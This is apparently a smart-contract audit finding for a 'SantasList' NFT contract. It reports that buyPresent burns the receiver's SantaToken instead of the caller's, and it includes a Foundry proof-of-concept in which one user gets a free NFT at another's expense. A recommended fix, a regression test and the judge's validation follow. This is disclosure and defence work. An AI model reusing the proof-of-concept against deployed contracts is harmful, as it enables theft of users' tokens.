Submission Details
Severity: high
Valid

Malicious user can call `buyPresent` with the address of a user who just collected a present to get an NFT

Summary

A malicious user can call `buyPresent` with the address of a user who has already collected a present and receive an NFT for free.

Vulnerability Details

An attacker can monitor for addresses that call the `collectPresent` function. Immediately afterwards, they call `buyPresent` with one of those addresses as the argument. The tokens of the address that just collected are burned to pay for the present, and the attacker receives an NFT for free.

Impact

A user can call the `buyPresent` function to get an NFT for free, at another user's expense.

Tools Used

Foundry

POC

```solidity
function testMaliciouslyCallBuyingPresent() public {
    // Santa marks `user` as EXTRA_NICE on both lists so they are eligible to collect.
    vm.startPrank(santa);
    santasList.checkList(user, SantasList.Status.EXTRA_NICE);
    santasList.checkTwice(user, SantasList.Status.EXTRA_NICE);
    vm.stopPrank();

    // Move past Christmas so presents can be collected.
    vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);

    // `user` collects their present (an NFT plus SantaToken).
    vm.startPrank(user);
    santasList.collectPresent();
    vm.stopPrank();

    // `user2` never collected anything, yet buys a present "for" `user`.
    vm.prank(user2);
    santasList.buyPresent(user);

    // `user` keeps their one NFT but their SantaToken was burned to pay,
    // while `user2` walks away with an NFT they never paid for.
    assertEq(santasList.balanceOf(user), 1);
    assertEq(santaToken.balanceOf(user), 0);
    assertEq(santasList.balanceOf(user2), 1);
}
```

Recommendations

The `buyPresent` function can be rewritten like this:

```solidity
function buyPresent(address presentReceiver) external {
    i_santaToken.burn(msg.sender);                // charge the caller, not the receiver
    _mintAndIncrement();                          // mints the new NFT to msg.sender
    transferFrom(msg.sender, presentReceiver, s_tokenCounter - 1); // hand it to the receiver
}
```

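As an added regression check that is not part of the submission or the project's own test suite, the Foundry test below exercises the rewritten `buyPresent`: a caller holding no SantaToken can no longer charge someone else, and an honest buyer pays from their own balance while the receiver gets the NFT. It reuses the fixture names from the POC (`santasList`, `santaToken`, `santa`, `user`, `user2`) and assumes that `SantasList` deploys its `SantaToken` in the constructor and exposes it via a public `i_santaToken` getter, that one present costs `1e18` token units, and that the forge-std `deal` cheatcode can seed ERC20 balances; all three are assumptions to check against the project's code.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.22;

import {Test} from "forge-std/Test.sol";
import {SantasList} from "../src/SantasList.sol";
import {SantaToken} from "../src/SantaToken.sol";

// Regression tests for the recommended buyPresent fix (burn from msg.sender,
// transfer the minted NFT to presentReceiver). Fixture names mirror the POC above.
contract BuyPresentFixTest is Test {
    SantasList santasList;
    SantaToken santaToken;

    address santa = makeAddr("santa");
    address user = makeAddr("user");   // victim in the original finding
    address user2 = makeAddr("user2"); // would-be attacker, later an honest buyer

    // Assumed cost of one present in SantaToken units; adjust to the amount
    // SantaToken.burn actually removes.
    uint256 constant PRESENT_COST = 1e18;

    function setUp() public {
        // Assumption: SantasList deploys its SantaToken in the constructor and
        // exposes it through a public getter. Mirror the project's own test setUp.
        vm.prank(santa);
        santasList = new SantasList();
        santaToken = SantaToken(address(santasList.i_santaToken()));
    }

    // Same preparation as the POC: make `user` EXTRA_NICE and let them collect.
    function _collectAsUser() internal {
        vm.startPrank(santa);
        santasList.checkList(user, SantasList.Status.EXTRA_NICE);
        santasList.checkTwice(user, SantasList.Status.EXTRA_NICE);
        vm.stopPrank();
        vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
        vm.prank(user);
        santasList.collectPresent();
    }

    // After the fix, a caller with no SantaToken cannot charge someone else.
    function testCallerWithoutTokensCannotBuyPresent() public {
        _collectAsUser();
        uint256 victimTokens = santaToken.balanceOf(user);
        uint256 victimNfts = santasList.balanceOf(user);

        vm.prank(user2);
        vm.expectRevert(); // burn(msg.sender) must fail: user2 holds nothing
        santasList.buyPresent(user);

        assertEq(santaToken.balanceOf(user), victimTokens, "victim tokens must be untouched");
        assertEq(santasList.balanceOf(user), victimNfts, "victim NFT count unchanged");
        assertEq(santasList.balanceOf(user2), 0, "caller gets no NFT");
    }

    // The intended flow: the buyer pays and the receiver gets the NFT.
    function testBuyerPaysAndReceiverGetsNft() public {
        deal(address(santaToken), user2, PRESENT_COST); // forge-std cheatcode
        uint256 receiverNftsBefore = santasList.balanceOf(user);

        vm.prank(user2);
        santasList.buyPresent(user);

        assertLt(santaToken.balanceOf(user2), PRESENT_COST, "buyer paid from own balance");
        assertEq(santasList.balanceOf(user), receiverNftsBefore + 1, "receiver got the NFT");
        assertEq(santasList.balanceOf(user2), 0, "buyer keeps no NFT");
    }
}
```

Run it with `forge test --match-contract BuyPresentFixTest`. The first test fails against the original `buyPresent` (the call succeeds and the victim's balance drops to zero, exactly what the POC shows) and passes once the burn is charged to `msg.sender`, which makes it a useful guard against the bug being reintroduced.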
Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

buyPresent should use msg.sender

Current implementation allows a malicious actor to burn someone else's tokens as the burn function doesn't actually check for approvals.

buyPresent should send to presentReceiver
